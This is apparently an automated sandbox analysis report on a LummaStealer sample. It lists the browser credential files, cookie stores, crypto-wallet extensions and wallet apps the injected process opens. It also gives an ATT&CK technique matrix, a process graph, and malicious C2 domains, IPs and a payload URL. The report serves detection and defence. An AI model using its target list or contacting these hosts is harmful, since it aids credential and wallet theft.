                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.3.Installer.exe.35f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.3.Installer.exe.35f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts2
                Windows Management Instrumentation
                1
                Scripting
                1
                Access Token Manipulation
                11
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Input Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Access Token Manipulation
                11
                Input Capture
                241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                24
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)1
                DLL Side-Loading
                311
                Process Injection
                Security Account Manager11
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares31
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information
                NTDS14
                File and Directory Discovery
                Distributed Component Object Model2
                Clipboard Data
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information
                LSA Secrets46
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560657 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 36 processhol.sbs 2->36 38 librari-night.sbs 2->38 40 joxi.net 2->40 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 60 6 other signatures 2->60 9 file.exe 8 2->9         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 9->32 dropped 34 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 9->34 dropped 62 Contains functionality to register a low level keyboard hook 9->62 13 cmd.exe 2 9->13         started        signatures6 process7 process8 15 Installer.exe 13 13->15         started        19 7z.exe 2 13->19         started        22 7z.exe 3 13->22         started        24 6 other processes 13->24 dnsIp9 44 joxi.net 176.9.162.205, 49706, 80 HETZNER-ASDE Germany 15->44 46 Writes to foreign memory regions 15->46 48 Allocates memory in foreign processes 15->48 50 Injects a PE file into a foreign processes 15->50 52 2 other signatures 15->52 26 RegSvcs.exe 15->26         started        30 C:\Users\user\AppData\Local\...\Installer.exe, PE32 19->30 dropped file10 signatures11 process12 dnsIp13 42 librari-night.sbs 172.67.206.172, 443, 49707, 49708 CLOUDFLARENETUS United States 26->42 64 Tries to harvest and steal ftp login credentials 26->64 66 Tries to harvest and steal browser information (history, passwords, etc) 26->66 68 Tries to steal Crypto Currency Wallets 26->68 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe32%ReversingLabs
                file.exe14%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe71%ReversingLabsWin32.Trojan.LummaStealer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://librari-night.sbs:443/apihv.default-release/key4.dbPK100%Avira URL Cloudmalware
                https://librari-night.sbs:443/apitPK100%Avira URL Cloudmalware
                http://usbtor.ru/viewtopic.php?t=798)Z0%Avira URL Cloudsafe
                https://librari-night.sbs/b100%Avira URL Cloudmalware
                https://librari-night.sbs/=100%Avira URL Cloudmalware
                https://librari-night.sbs/apiAA==100%Avira URL Cloudmalware
                http://usbtor.ru/viewtopic.php?t=798)Z0%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                joxi.net
                176.9.162.205
                truefalse
                  high
                  librari-night.sbs
                  172.67.206.172
                  truefalse
                    high
                    processhol.sbs
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://librari-night.sbs/apifalse
                        high
                        p3ar11fter.sbsfalse
                          high
                          http://joxi.net/4Ak49WQH0GE3Nr.mp3false
                            high
                            peepburry828.sbsfalse
                              high
                              p10tgrace.sbsfalse
                                high
                                processhol.sbsfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPrInstaller.exe, 0000000B.00000000.2101759997.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe, 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe.9.drfalse
                                    high
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#Installer.exe.9.drfalse
                                      high
                                      https://sectigo.com/CPS0file.exe, Installer.exe.9.drfalse
